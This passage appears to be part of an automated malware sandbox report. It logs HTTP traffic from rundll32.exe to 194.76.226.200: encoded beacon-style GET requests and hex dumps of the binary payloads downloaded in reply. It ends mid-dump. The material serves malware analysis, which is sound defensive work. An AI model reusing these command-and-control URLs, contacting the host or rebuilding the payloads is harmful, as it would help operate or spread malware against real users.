              Jan 26, 2022 10:28:10.738502026 CET1249INHTTP/1.1 200 OK
              Server: nginx/1.18.0 (Ubuntu)
              Date: Wed, 26 Jan 2022 09:28:10 GMT
              Content-Type: application/octet-stream
              Content-Length: 205974
              Connection: keep-alive
              Pragma: public
              Accept-Ranges: bytes
              Expires: 0
              Cache-Control: must-revalidate, post-check=0, pre-check=0
              Content-Disposition: inline; filename="61f1142aaf285.bin"
              Data Raw: 0b 34 4a a5 90 0e c7 6f 93 f0 c9 9c 13 02 b2 b5 cc 76 30 92 6d 0e 22 4f c9 58 34 d7 fe b5 ba b7 5a ab 0e a3 52 08 62 4c 78 fd 91 22 35 10 c2 d3 61 1c 83 02 81 d8 3b c6 4c 9f eb b4 93 cc 31 0c 68 76 c0 57 f4 7b a4 04 53 d7 14 5d 88 7d 03 7f 09 50 4e 57 7a 07 db 05 d1 c4 36 78 ca 9d 10 4e ac a5 10 d0 07 02 c5 07 66 1b 6c 2b 79 30 7f 1d 61 fa ac 7f 36 be 4a 04 de 90 63 1a 5b eb 1a 72 1b 4f 2b 13 db 9c e2 df ae bc dc b0 ca 11 68 65 0d 38 ae be 00 a2 bd de 57 9d 31 ab 78 b9 89 12 36 b3 5a b7 d9 1b df fc 64 47 88 e6 91 15 96 e3 4d b2 e6 5f d6 d8 58 8f 3a b2 67 59 28 e5 38 d6 f3 d4 ec c8 10 cb 0f 32 41 a7 2a d0 1f 18 bc 53 77 e0 20 7c d9 e5 cf 26 82 51 e7 3e 03 7e 6e fa 82 c6 5a 4f 55 0d 03 d4 ae bf c0 d0 28 38 d8 07 65 cf 62 68 a7 c1 c1 d1 04 9c 39 0e 98 08 1e 90 cd 54 de 73 d1 7d 48 94 0f e7 c3 6f 7a 6f 11 8f bb 47 84 66 c5 95 8c 15 cd ea 00 37 32 9a 90 18 45 54 38 b7 be e8 a1 cc 90 1b 98 f1 f7 5a 39 ed 58 2e 04 21 85 12 70 7e 32 24 af ae 9e fb f0 56 71 b6 4f 4b db 22 16 8a 68 b9 da ae 4c a4 5e 8a 77 c8 50 57 04 fc 36 4d c9 28 17 cc a9 81 22 5d 70 7d 9c 4d 02 d1 7b 80 bb 0b e2 ca 73 5a 01 64 06 8f 11 cb 55 51 80 c1 18 c1 c9 38 11 f1 13 d6 39 8d df 7c c4 5e 86 65 c8 35 0a 13 62 48 d7 63 b1 c8 c7 a1 4f f7 6d 06 b5 57 50 fd 27 7b e8 0c 6a 1e 71 3c 3d d8 b8 0e 92 d2 51 19 3e 30 75 20 1f f4 aa 5f a3 2e 32 8a 0d a5 9f 80 7f fd 5b 6a 34 7b 2f 49 f0 28 0b 2b 1b 91 d8 0c 02 6b 60 96 ca 7c 5b 3f f2 0e 4e e1 a6 3a 7d a3 b6 31 11 ca 38 ad 77 4f 69 88 5b d8 dc 1c 50 fc 43 23 dd 4f 28 ab 4b 83 97 d9 83 86 37 d4 35 ee de 1e ed 9f 4b dd 00 a3 72 52 c7 27 04 4d 81 eb e9 ec 96 aa f9 2e 3f 42 c9 06 71 55 3b ac 74 d6 c3 51 95 7c a9 88 a1 29 cd 87 8b 8d 91 80 c2 27 be 0a 9a 79 c4 71 2f 66 cd 0d 8f ea 0b 71 9c 31 65 9c b4 71 c7 83 db 73 ef 97 72 58 6b ec 28 a0 a2 3d 78 f2 60 48 bd de f7 4d 89 e4 48 56 c7 c7 33 40 4f cd 43 22 8e e4 4d 45 8d 73 df 8f 3b 90 ff 56 18 e1 52 36 d5 ad bd 2c e6 ab d4 98 46 02 74 39 79 e3 9d 17 d0 64 90 67 45 46 51 f1 67 82 66 1f 8c 5d 2f d4 55 75 55 00 e1 f5 7d bc b1 1d dc e3 cb 0d 0f 1d 20 b2 78 4b 19 50 9b 9d 80 05 ad 82 b1 4a 3d a9 c6 8d db f6 d1 40 f3 1a 7f 08 ee 73 12 77 8d f0 26 11 a9 d2 b2 53 5f cd 10 a7 56 ee 93 fb 29 64 a4 0d 0c 5a b7 dd f2 4d d8 ac d3 2e 26 e7 8b 9b 7a b8 46 13 e9 c5 1c a2 84 04 46 b6 03 bc dc 61 89 60 bc 13 9e 91 fa d6 f3 ea 0d 74 f1 38 9b 17 fd 5a 50 d8 4f 55 d3 bd f2 87 17 1a 66 8d 83 19 72 7f 9a 6d 49 86 65 84 7a 01 74 85 b2 c3 1d 24 dd 41 ae c5 26 a2 88 c2 f8 ee 1f 8b 69 75 6d 97 da 41 2d 1c 40 fb 6c 84 ee 4e cc e2 be 87 77 6e 71 f8 6c c4 5c 80 74 ca 68 f2 43 f6 3b ab 9d e3 3a 5f d2 44 73 0e be 3b 81 44 26 a5 16 3f 25 ba af e4 df 06 9c 06 17 77 74 07 91 08 54 dd 3d 33 1d 89 0b 05 11 e2 e7 cc 35 63 3d 83 27 fc 18 6e 35 dc 0e 03 ac 48 0e c6 06 d7 2c fe 39 2e 2a a3 29 3c ed c6 e5 88 ea bc 33 77 d9 07 43 16 a8 a3 36 e1 64 5a 40 a3 c8 50 1f fc a8 1d dc 70 3f 8f 91 29 e5 46 82 3a 29 d0 07 c8 e2 80 2b f0 30 a3 39 18 0e b1 c8 d9 db 90 7d 26 dd 91 2f f6 8e 45 3e 1b 26 e1 6f 5b 1f 0b f1 b9 12 d0 62 7e 46 46 19
              Data Ascii: 4Jov0m"OX4ZRbLx"5a;L1hvW{S]}PNWz6xNfl+y0a6Jc[rO+he8W1x6ZdGM_X:gY(82A*Sw |&Q>~nZOU(8ebh9Ts}HozoGf72ET8Z9X.!p~2$VqOK"hL^wPW6M("]p}M{sZdUQ89|^e5bHcOmWP'{jq<=Q>0u _.2[j4{/I(+k`|[?N:}18wOi[PC#O(K75KrR'M.?BqU;tQ|)'yq/fq1eqsrXk(=x`HMHV3@OC"MEs;VR6,Ft9ydgEFQgf]/UuU} xKPJ=@sw&S_V)dZM.&zFFa`t8ZPOUfrmIezt$A&iumA-@lNwnql\thC;:_Ds;D&?%wtT=35c='n5H,9.*)<3wC6dZ@Pp?)F:)+09}&/E>&o[b~FF
              Jan 26, 2022 10:28:10.738564968 CET1250INData Raw: 41 1e fe e1 f1 ae a3 57 10 dd a0 5a ca b8 50 30 d7 31 ea b4 01 7d c2 91 09 08 ce 9b d1 e6 ae 6c fd 9e da 16 2a 6a 80 64 7f 63 cb 76 b1 e5 70 b3 4b ee ae 74 a8 07 13 22 4b 4d e3 26 0a 0e bb b8 51 ea 8f 9e 44 a0 8d 09 23 0d 24 94 39 77 f8 a2 f1 be
              Data Ascii: AWZP01}l*jdcvpKt"KM&QD#$9w"rh=EMw Xxc0~QSmdo8-3eehDx9p1;xt0ccU_n9G~X$$Z~W/sQwI9R:(Ka>k
              Jan 26, 2022 10:28:10.738637924 CET1251INData Raw: 0a ca f3 c8 64 af b7 9c 50 26 44 70 2c 49 ff fe 67 7c 2b 05 27 83 9d ca d1 41 18 02 0a 1a 69 be 8a 10 be 39 ff 50 5e cb 38 a1 51 e9 b8 25 c3 da 00 ce b2 d3 11 05 ff ac ef cd 0f 59 9b ac 6d e0 09 ff 46 68 14 b7 81 d5 da 21 d7 10 14 ba f5 d7 a3 71
              Data Ascii: dP&Dp,Ig|+'Ai9P^8Q%YmFh!q%KNZ6uFY-]_;D[V`>l0&}Lc{+%L9",~uGKU/N^lNw3b3HU/]0e:$A}D"KJ
              Jan 26, 2022 10:28:10.738676071 CET1253INData Raw: ca 39 82 32 ae 72 18 43 1c dd fd 9b ed f6 51 8d ab c6 11 93 a3 20 6e 4b 45 a0 05 a1 80 3f 8d 61 0c 33 55 27 ba 6c 58 57 e5 a2 d4 6a f3 b3 69 e0 3e 0d bb 52 e4 78 c8 75 a6 a1 3c c3 1b 3b d0 ab c4 67 e2 1f 96 3e fb 45 87 8a a9 92 b9 41 ab 64 84 02
              Data Ascii: 92rCQ nKE?a3U'lXWji>Rxu<;g>EAda!i6MT%s9WBIRn<mywgVS*;N+0Ne"D+4`_8K7{g<T<FJ. 7H/=}
              Jan 26, 2022 10:28:10.738739014 CET1254INData Raw: 2f da e6 93 1c a7 c9 16 59 cf 4e 4e ad 91 65 c2 8a da 4b be d1 0c bc de 95 69 0b 8a 07 73 b2 86 1d cf 52 a3 44 c3 a2 5d 4a 22 1c c1 7c 10 9d 26 f5 e4 e3 96 0f 93 73 85 b6 92 35 64 27 a7 d9 16 0d 58 c3 ff 09 4c c5 6f 63 9a ce 1a 10 a7 b6 d1 97 58
              Data Ascii: /YNNeKisRD]J"|&s5d'XLocX'|RQy4MoPg37L_>2dZ}5xNYg'uP]YgH8+6uwHZ@F,D]y]4-d5VpBmKK
              Jan 26, 2022 10:28:10.738778114 CET1256INData Raw: 2b 1d da c2 1d 24 4b f5 b5 ea a5 b2 62 ea 22 a0 72 b6 c7 3a cd dd 7a a3 b2 48 b4 c1 0a 16 9b b3 2b b2 92 14 9d f2 6d 4b 94 43 6a 10 36 cf 56 b9 06 d7 99 90 a6 6d 24 a6 71 8b 1c 56 02 7c 48 0e 94 7c 42 8a 13 68 47 5f 9a 99 f1 fa 2a 72 3a 87 da 1c
              Data Ascii: +$Kb"r:zH+mKCj6Vm$qV|H|BhG_*r:!>QBE.}fS.%;$-<*@_yV1aio /{-0D<mzC.HRto.N,/UjV#|G=XHjpG>Kt<]B
              Jan 26, 2022 10:28:10.738832951 CET1256INData Raw: 3a 5c 45 2a fe db 99 e8 c3 fe 61 44 7a e7 f7 ef 0c 17 e0 d7 65 eb e4 80 70 32 e8 72 16 e7 dd 93 ba b3 f2 d4 b3 1a 70 b9 04 67 92 ab 70 29 f5 4b 2b d9 ad 6d 6f f5 a9 5a 41 33 14 50 da f9 d4 2e 7b 4f 8e 4b 43 d8 b4 b6 22 42 53 b1 f2 70 6d c6 53 59
              Data Ascii: :\E*aDzep2rpgp)K+moZA3P.{OKC"BSpmSYfXo|u_vMGht\mu0QRNuegGi|r45!Z2EYoa5n)
              Jan 26, 2022 10:28:10.738871098 CET1257INData Raw: 1f 46 dd 39 6a e7 ee f5 53 dc 9b 06 ac 90 d4 3b 67 ae 1b c1 52 b2 50 76 d3 e8 37 e1 a6 db 59 88 06 5a 11 85 02 ec 0d ea 01 33 81 bf e6 76 e2 96 d7 26 1d f3 32 ab 6c 59 68 42 c2 e1 f6 80 ba bc 63 e4 e6 31 d8 7a 89 b4 fa a7 59 58 62 d8 c3 4e fd d9
              Data Ascii: F9jS;gRPv7YZ3v&2lYhBc1zYXbNIbt]rDxY3-vmua{eiwcU3){_+r$1B|2iR?}_.B`T>1KR8K vvw%/yN+@|cxgR
              Jan 26, 2022 10:28:10.738909006 CET1259INData Raw: 98 2c d9 b4 4e f3 68 58 f9 0e ab 80 69 3b ef 41 53 03 60 a4 6f 2d ca b3 91 be f8 e0 06 cc 2b 9c 3e 70 83 bb 26 bb db b3 f9 4d 08 88 74 1c e6 4f d7 36 2b 72 01 1e d8 a8 7d cc 2e 91 a2 b1 ba 25 8b 83 40 cf fe 89 83 9a 85 e6 ad 57 67 3e 26 a7 36 1d
              Data Ascii: ,NhXi;AS`o-+>p&MtO6+r}.%@Wg>&6`8~ZCs?O23d!,!w(E3AHNc+xYw!3't3-!Rs;~p)T9;yEu\A>;CR%2f=`A
              Jan 26, 2022 10:28:10.738971949 CET1260INData Raw: c1 88 d1 4b d7 fa 8f 60 1a a7 4c fd 83 e2 de 6d 85 53 29 12 be f7 e5 8f 0f 90 6a 0b 0c 82 3f f7 5d 96 02 48 71 95 08 d4 66 07 a7 a6 a4 e6 f5 8f 84 21 7c 96 8f d6 c2 65 10 44 84 a6 d9 01 2d 90 3a 9d e2 8b 40 6e d9 c3 bb 1a 50 65 80 f1 e7 5f c0 3a
              Data Ascii: K`LmS)j?]Hqf!|eD-:@nPe_:42\)%uu{{d\{x<J/InJ<0%GWc(x8aHH:grs'w9Xf>C"+F/3"csi\gy4uJ!iZj[
              Jan 26, 2022 10:28:10.760608912 CET1385INData Raw: 4e 21 85 2d 19 14 20 8f a4 df 90 16 75 d9 f0 db 92 b5 d1 99 25 b8 71 b8 e2 fb 02 95 4f 85 58 01 6b 41 c7 e0 22 cc 72 ea f2 cf 73 8c 2a 89 cb 20 26 2c cf 12 a2 8f 4a 58 5c 42 41 94 c1 af dd 3f b5 a7 a7 54 2b e7 54 b9 1c 3c 4c 42 5e 50 ee 5a 8d 04
              Data Ascii: N!- u%qOXkA"rs* &,JX\BA?T+T<LB^PZwk~x,GH'dlyndS\>znPtx]<`N__N2J<'$8J@"`Z30E:Z68IwQPc1ypYKq,4yZYY"D!s@Yu \rx5<{
              Jan 26, 2022 10:28:11.148814917 CET1761OUTGET /drew/SzHdMdWvg/8JrkfhvX1ImoPdiWmQP6/QNbELOUZkV6PJ_2F_2B/T_2FBOZzzLom_2BccXK2f_/2B4napL_2F34z/ZunofQOB/e8FUQk93KOWF2nr5L7lasmZ/NJz0CTr65M/vqC70qv5uFkSE3WWV/uzLbKezipUQb/EiDVCVAB9rI/YTJRJOijIzHReN/lOWZ3chpUTxk47un6IsE8/fGRw3zIlPFEXwpmw/KXHYTQF2fkI3XOU/3s8f8mWLipjSZC2MeH/eanpmASqD48wQWqOn/qyD.jlk HTTP/1.1
              Cache-Control: no-cache
              Connection: Keep-Alive
              Pragma: no-cache
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
              Host: 194.76.226.200
              Jan 26, 2022 10:28:11.427643061 CET2181INHTTP/1.1 200 OK
              Server: nginx/1.18.0 (Ubuntu)
              Date: Wed, 26 Jan 2022 09:28:11 GMT
              Content-Type: application/octet-stream
              Content-Length: 262298
              Connection: keep-alive
              Pragma: public
              Accept-Ranges: bytes
              Expires: 0
              Cache-Control: must-revalidate, post-check=0, pre-check=0
              Content-Disposition: inline; filename="61f1142b64746.bin"
              Data Raw: bc 58 44 2d 3f 69 1c 31 6f 19 ce bd 43 f0 20 48 2f a8 05 9b 0e 7a 3e 20 f1 f5 39 03 5c ec 25 14 47 ca 20 58 0c 21 39 da 11 c2 cf 7d ea e9 bd e0 29 31 a9 65 5b 07 36 21 bc bd 3c 8d 80 a7 96 dd 76 86 90 74 45 b9 fa 0c 05 46 10 a3 e9 f0 9a 00 ca 11 6e 65 f9 dd 9d 9e 33 63 61 96 0d 7f bc 6d 8d a8 fa 74 5b 85 1f 03 07 2f 96 87 82 0b c0 50 5b e2 9b 0f 15 ef 3a 18 83 ed 78 e9 24 bd d5 50 65 eb d4 69 41 35 6c 8b 36 81 b0 b7 83 87 f2 99 9c dc 14 4c 1a 9e 39 2a 93 cb 6a 9f b7 da 70 12 ff f3 e9 54 c1 a0 da e7 c8 3b cd 2b 9e 48 f8 94 94 82 5c 2e 01 04 3b ba cd a4 44 0b d1 57 48 d1 40 8a 69 00 8a 79 dd 8d 7f 68 fe db 65 87 08 d5 9d 19 70 c1 d2 12 63 26 8d b8 8f eb e2 d4 f6 0c 7d bc 55 af 67 0e 49 6d 0e b0 bd d1 80 06 ea 38 2b 65 3b 8e 6a 76 d7 f7 89 2e 85 0a c9 be b2 8c 42 42 4f 7b 28 2c 6d 27 b9 7b cc 91 47 6f 1f 88 98 1e 3e d4 28 68 c2 c6 76 65 3d 09 3a a5 72 b4 46 f1 e0 d2 94 e7 57 7c e8 19 8c 31 83 ce 83 e7 97 ce 0d 51 ff c2 23 5d df 8e 64 07 b2 10 d9 cf 61 82 c5 34 79 bc fd f2 a6 c1 4e ef 21 d0 c9 a8 a5 ac 9c ad c4 94 e9 f2 fb a7 38 f6 f7 3f ce 80 69 78 cd 93 be d3 de a3 10 69 6a 51 2d 59 9a 13 e0 53 b1 6f 72 a4 e1 7f b3 90 b1 fc d9 aa 59 bc 59 97 82 64 99 0b ac a8 04 bd 04 4c b6 24 de 0d 53 fe 01 a3 13 6e d8 22 78 59 53 fe 95 18 0c 81 d7 5f 8a cd 05 69 1c 65 4a 9b 24 46 06 ac fb 49 9d de 37 60 ae ee c6 6b 29 02 6c 0e a1 3b e0 0e 43 a4 1b 5b 9b c0 e8 8d 54 45 de 9a d1 7b 85 30 17 70 2e 5e fa d1 ea 55 b7 09 4a 45 19 fd 62 7d d2 c2 37 e1 59 70 cb cb f0 59 12 f6 21 3d f8 f7 9e e0 e8 e5 02 1e 2a 2d a8 96 a4 77 f2 5a 2a ef d7 3e 65 47 a9 bb 0f ac db c5 65 7c 27 de b3 3a c9 4a 7a f7 24 47 cf f8 cd e4 d7 14 66 55 28 59 d9 9a d7 12 6e a0 84 de a0 76 b4 cc c5 48 c8 d7 da ed f3 f6 89 a3 23 08 7a d6 31 49 1b e9 e7 f5 6d ad ef 63 c9 09 43 4d d4 6e 47 18 ac 32 2b 65 3e 82 1d 23 61 ac 1b a2 06 be 9d 19 7b 20 df cf 5a 03 ac 9d 11 d3 47 69 f2 af ce 4b ad a1 ef 2b fc 8e 36 0b db d3 e8 4b cd 90 d7 c4 92 08 94 9b ae 29 f1 7f 1c f8 80 24 55 8b 13 76 d8 9f 21 95 73 57 a8 e4 ad be 38 75 6d fc 51 42 da 45 01 ce be a8 8e bf 1c 27 2d 78 d4 11 a5 de 6d 95 43 00 61 1a 51 12 77 fa b9 66 a5 85 6e 81 9b e4 d6 d3 38 f2 eb 8f 6f 53 50 e7 b4 4f a0 f6 69 88 5b 7b c9 03 a4 02 a7 22 52 c6 cd ec d7 dd 58 53 72 01 a5 ea 13 88 ee ef 11 74 a2 bb a7 5a c3 df 31 00 6b ae a5 2c 3e 2d ae 96 ac 4e 83 f7 22 7b 95 a1 31 5a 5d cb ec cc 1a 30 9a c8 2e c3 ed d6 0e fe 52 10 aa d4 ef 89 c6 37 cf fa cd ec c6 8e 8b 1c 5c 25 7c fd 28 86 e8 72 01 b6 e2 94 96 0a 71 4f 83 2d 17 55 15 40 67 58 d8 63 b4 d1 ac 11 2e 37 21 1c 87 20 31 1f 0c 46 58 bb bd ac 41 e6 de 27 05 ca 9c 2d 48 d8 ef 9a e1 71 92 d6 32 99 0d 05 06 b5 45 8e 7a b5 1d b6 89 fa 46 1a e3 d4 79 21 b8 92 e5 c3 80 40 10 5d 85 c8 10 a5 41 c9 0e c6 a2 34 a1 fe b9 e0 85 93 9e 82 3e cc a0 69 a9 d5 7e 1e c3 f2 3f 74 9c 1f 33 20 ec 8f 5a 4f bb 8f 8f e7 42 99 ac 96 ae b4 51 30 56 2f 40 53 32 2f 92 bf 80 4d e5 84 a4 7d bb 6d 96 8c e2 2f 32 c1 b2 a3 da dc 2f fc c6 e4 ea 5b 7c 88 44 b3 05 8f d6 94 0f 25 19 c3 c4 c4 0b 74 37 12 d5 4d ac 86 2b 00 39
              Data Ascii: XD-?i1oC H/z> 9\%G X!9})1e[6!<vtEFne3camt[/P[:x$PeiA5l6L9*jpT;+H\.;DWH@iyhepc&}UgIm8+e;jv.BBO{(,m'{Go>(hve=:rFW|1Q#]da4yN!8?ixijQ-YSorYYdL$Sn"xYS_ieJ$FI7`k)l;C[TE{0p.^UJEb}7YpY!=*-wZ*>eGe|':Jz$GfU(YnvH#z1ImcCMnG2+e>#a{ ZGiK+6K)$Uv!sW8umQBE'-xmCaQwfn8oSPOi[{"RXSrtZ1k,>-N"{1Z]0.R7\%|(rqO-U@gXc.7! 1FXA'-Hq2EzFy!@]A4>i~?t3 ZOBQ0V/@S2/M}m/2/[|D%t7M+9
              Jan 26, 2022 10:28:11.894968987 CET2593OUTGET /drew/S0hO4k1kNWmaIbAIKk6J/C6ltlnn67F9zU4319Wq/SHohWMCDfW7oiPhqwsiIKI/bmU8FVW7oRmBm/mR3BXgY_/2FBwUjw6HBJfko8dOlgJjVp/0AJ_2FHS_2/F6As3DqY8qnvNETrK/YeXgHXybA3MO/9wS_2FpxfKh/va60IJVV7f3myC/lkXy0Vd4C9gsuVelNEUUO/TZ36G6O4b_2Br5X5/Ty9Sl6i_2F9Ot_2/Fw5KU6KNbXI13KA_2B/fSlw9uxRZ/1GDQy2uvqr3Bg6MoNgQy/Xe_2F1.jlk HTTP/1.1
              Cache-Control: no-cache
              Connection: Keep-Alive
              Pragma: no-cache
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
              Host: 194.76.226.200
              Jan 26, 2022 10:28:12.168813944 CET2597INHTTP/1.1 200 OK
              Server: nginx/1.18.0 (Ubuntu)
              Date: Wed, 26 Jan 2022 09:28:12 GMT
              Content-Type: application/octet-stream
              Content-Length: 1800
              Connection: keep-alive
              Pragma: public
              Accept-Ranges: bytes
              Expires: 0
              Cache-Control: must-revalidate, post-check=0, pre-check=0
              Content-Disposition: inline; filename="61f1142c24e04.bin"
              Data Raw: f7 46 fb 9e 69 b9 56 c0 85 b5 3c ae 3e aa 33 38 35 5a 64 d6 52 bc 42 12 16 86 d3 f7 ff 19 25 a1 c8 72 2b cd 25 8a 0f 08 f0 2e e4 61 ba 42 9d 9e ee 3c 23 65 bb 49 f2 14 21 9d 9f bb f8 74 45 7d af 3c 4f 96 e8 0c 62 35 ae 13 55 7f f4 5b 3e ec 33 8a 5f 02 aa 2c bb 78 58 74 91 ef b2 91 fc 07 b1 e7 58 01 16 72 83 2b 7e 5a 2e 22 8b 9a 65 0b d7 79 6e 0d e7 28 15 6a e8 b1 91 82 21 54 f1 42 d4 5c ed 5a 9c ad ca f0 37 09 c3 4d 66 b4 a8 3a bf 34 89 96 61 91 fe 08 92 fa 9f 07 60 20 f9 72 77 bb 00 7e de 0d c5 36 8a 15 d9 0b d3 65 62 da dc bf de 5f 75 31 c8 2c 19 59 bb a0 b5 1d cd 5a 5f a9 ef 87 62 5a b8 2f ac b2 11 ba 5a 0e 85 47 da bb e7 69 e5 5a c5 8c 7e 71 4d cc 84 0c ca 20 e6 fc ea e1 ae 33 29 98 ea 7b 38 ab f4 89 e3 49 13 e8 f4 12 e2 b3 55 2c 03 e7 b0 71 4f 4c c1 67 d4 2f 4e 58 7a 5c 7c c7 91 c9 1f fb a9 00 72 7d 9e aa ed 09 bb e1 ea 33 18 c0 d8 95 2f c5 62 25 0b 77 08 41 79 0e 45 9e d9 2b fe e2 ff e7 46 c5 3c 9c 66 88 d2 65 6f d2 88 5a d0 b6 ad 21 b8 01 78 29 d4 8a 06 b1 40 40 bf d5 3d f3 f2 e8 5a fd c5 52 a6 bc 72 a5 1d e9 fe ff 88 56 52 a7 51 8c 13 e5 cb c9 d4 8b 03 7f bb 74 fb ac d1 e1 00 d2 40 cc 15 62 fd 28 ae d8 34 fd 56 dd 6c 02 c9 38 19 2f ff df ce c5 7b 74 cc 44 3d 9c 38 ea 8d 3a 35 f4 c4 01 79 8e 45 d4 c5 dd 89 51 09 7b 3a eb c5 23 9a c6 b6 24 68 77 a9 fb b9 ae c7 ad ae 82 05 1d 78 53 91 a8 80 31 28 10 54 42 2d 2b 6d 56 81 77 61 22 86 c5 47 fa 9a 53 8d bd 63 91 d5 01 a2 1c 33 70 53 45 62 7e 67 68 c2 25 eb 66 32 05 09 0b 79 d2 23 03 03 d2 3a f3 73 e2 c6 5f a8 02 78 b2 d6 5a 2e 24 6e f7 81 5d c4 a4 f2 1e ac 17 c2 eb 88 10 41 7d 02 c7 f9 c0 47 f5 73 8f 0c 15 77 09 27 50 3f 4d fe 7e 88 cb 97 9f 1f 67 28 83 81 84 a1 4b cc 96 e8 d8 2d 77 d2 a0 35 fc 5c c9 39 b0 32 79 1a 79 fb 68 7b 42 34 f4 a9 bb bc 44 6d 8c 97 71 2c 08 c7 8b d8 96 27 1e ed 11 b0 15 a2 16 73 18 fa 7b 31 dc d6 47 5a 83 a7 86 a5 91 84 19 02 d8 99 1f dd 25 a2 3e ee 3a 57 9f 14 d7 0b 14 b4 c3 2e 0c 9c 1c 82 eb ef 3f 79 73 0a 6b c1 1f ff bd 61 83 96 43 15 24 7d 24 26 68 20 d0 0c 3a 69 57 e7 84 4e 04 45 00 39 98 a6 0a 32 41 54 26 8d 78 f2 ab 3b 20 7c b5 42 eb 10 e5 6b 44 e5 f5 9a be d3 42 f8 16 75 bc 5c 2e e0 33 7b cd cd 80 de 28 00 da 8d 26 0e cd 12 fc df be f4 7e 62 e2 1f c9 41 c2 50 74 c5 ac 31 fe 87 d6 9a bf 2a 3b fb 54 1d 7c e4 24 56 54 21 51 52 66 d7 68 04 3e 8a 5e 97 4c fb 60 8d 6f 65 19 9a f8 b0 c4 e0 21 62 ae 1b 91 96 d0 e9 64 c9 94 39 68 9b bd ef 96 5f 8c 09 32 26 fd 16 ee f6 a3 da 2f e8 a6 e4 d5 3f 8b f0 32 ce cb bf 75 ae d3 3a 63 3b eb 80 90 73 e7 ec 24 40 94 f0 a9 2f b8 db d8 33 c3 16 a7 2f fe eb cf 3b 01 f2 b1 51 9b 60 07 8c 7b 63 93 44 26 8d b7 ef 24 46 1b 61 71 a9 6a eb 5b 7f 79 93 d7 d1 7e 0d ca f6 93 48 e2 b2 3b 0f 6f 05 94 5d 16 58 25 ef ea e5 ff 5b e9 01 84 71 a3 4b 17 20 2a 79 0f 12 7b 26 ff bd d7 56 cb 30 91 35 69 4b 0a b1 34 12 d6 cf d7 54 01 1a 9e f1 32 69 9c 1d 55 46 91 fb b5 55 b9 fc 09 6b c8 ae 5c 74 ed 69 bb fe 85 58 bc cd 3d 88 e1 f0 b3 4f cf 7b e6 41 a2 f0 7c 6f 76 01 1a 14 33 47 5c aa e1 b8 3d c9 81 d6 dc 23 8d 90 12 a3 b9 e1 ed 50 ab 0e 1b d9 f3 45
              Data Ascii: FiV<>385ZdRB%r+%.aB<#eI!tE}<Ob5U[>3_,xXtXr+~Z."eyn(j!TB\Z7Mf:4a` rw~6eb_u1,YZ_bZ/ZGiZ~qM 3){8IU,qOLg/NXz\|r}3/b%wAyE+F<feoZ!x)@@=ZRrVRQt@b(4Vl8/{tD=8:5yEQ{:#$hwxS1(TB-+mVwa"GSc3pSEb~gh%f2y#:s_xZ.$n]A}Gsw'P?M~g(K-w5\92yyh{B4Dmq,'s{1GZ%>:W.?yskaC$}$&h :iWNE92AT&x; |BkDBu\.3{(&~bAPt1*;T|$VT!QRfh>^L`oe!bd9h_2&/?2u:c;s$@/3/;Q`{cD&$Faqj[y~H;o]X%[qK *y{&V05iK4T2iUFUk\tiX=O{A|ov3G\=#PE


              Session IDSource IPSource PortDestination IPDestination PortProcess
              3192.168.2.349755194.76.226.20080C:\Windows\SysWOW64\rundll32.exe
              TimestampkBytes transferredDirectionData
              Jan 26, 2022 10:28:13.619188070 CET2599OUTGET /drew/rBML1rj8uElJfatm/1XUPHcYedh6XQNG/RfzcEZujO75haDUuMp/MBSLanUya/vTUM6CjwjVB_2F1X1CjS/LV0aTkXgDCKfXT831Mw/iqWmLrFI0W1nnldmY0nQOm/5tR5VYVCXmkqO/7H59YBEK/Qx8N4StPVj2TG0lcxpPmDMJ/os_2F27yzy/K94E3NnjB3SOalL_2/B5phCQkfkmoU/vGkUfmn2z2D/bI_2FkP7bk5mb4/JjP_2B8QttRH66r/R92.jlk HTTP/1.1
              Cache-Control: no-cache
              Connection: Keep-Alive
              Pragma: no-cache
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
              Host: 194.76.226.200
              Jan 26, 2022 10:28:13.898947001 CET2600INHTTP/1.1 200 OK
              Server: nginx/1.18.0 (Ubuntu)
              Date: Wed, 26 Jan 2022 09:28:13 GMT
              Content-Type: application/octet-stream
              Content-Length: 205974
              Connection: keep-alive
              Pragma: public
              Accept-Ranges: bytes
              Expires: 0
              Cache-Control: must-revalidate, post-check=0, pre-check=0
              Content-Disposition: inline; filename="61f1142dd784e.bin"
              Data Raw: 0b 34 4a a5 90 0e c7 6f 93 f0 c9 9c 13 02 b2 b5 cc 76 30 92 6d 0e 22 4f c9 58 34 d7 fe b5 ba b7 5a ab 0e a3 52 08 62 4c 78 fd 91 22 35 10 c2 d3 61 1c 83 02 81 d8 3b c6 4c 9f eb b4 93 cc 31 0c 68 76 c0 57 f4 7b a4 04 53 d7 14 5d 88 7d 03 7f 09 50 4e 57 7a 07 db 05 d1 c4 36 78 ca 9d 10 4e ac a5 10 d0 07 02 c5 07 66 1b 6c 2b 79 30 7f 1d 61 fa ac 7f 36 be 4a 04 de 90 63 1a 5b eb 1a 72 1b 4f 2b 13 db 9c e2 df ae bc dc b0 ca 11 68 65 0d 38 ae be 00 a2 bd de 57 9d 31 ab 78 b9 89 12 36 b3 5a b7 d9 1b df fc 64 47 88 e6 91 15 96 e3 4d b2 e6 5f d6 d8 58 8f 3a b2 67 59 28 e5 38 d6 f3 d4 ec c8 10 cb 0f 32 41 a7 2a d0 1f 18 bc 53 77 e0 20 7c d9 e5 cf 26 82 51 e7 3e 03 7e 6e fa 82 c6 5a 4f 55 0d 03 d4 ae bf c0 d0 28 38 d8 07 65 cf 62 68 a7 c1 c1 d1 04 9c 39 0e 98 08 1e 90 cd 54 de 73 d1 7d 48 94 0f e7 c3 6f 7a 6f 11 8f bb 47 84 66 c5 95 8c 15 cd ea 00 37 32 9a 90 18 45 54 38 b7 be e8 a1 cc 90 1b 98 f1 f7 5a 39 ed 58 2e 04 21 85 12 70 7e 32 24 af ae 9e fb f0 56 71 b6 4f 4b db 22 16 8a 68 b9 da ae 4c a4 5e 8a 77 c8 50 57 04 fc 36 4d c9 28 17 cc a9 81 22 5d 70 7d 9c 4d 02 d1 7b 80 bb 0b e2 ca 73 5a 01 64 06 8f 11 cb 55 51 80 c1 18 c1 c9 38 11 f1 13 d6 39 8d df 7c c4 5e 86 65 c8 35 0a 13 62 48 d7 63 b1 c8 c7 a1 4f f7 6d 06 b5 57 50 fd 27 7b e8 0c 6a 1e 71 3c 3d d8 b8 0e 92 d2 51 19 3e 30 75 20 1f f4 aa 5f a3 2e 32 8a 0d a5 9f 80 7f fd 5b 6a 34 7b 2f 49 f0 28 0b 2b 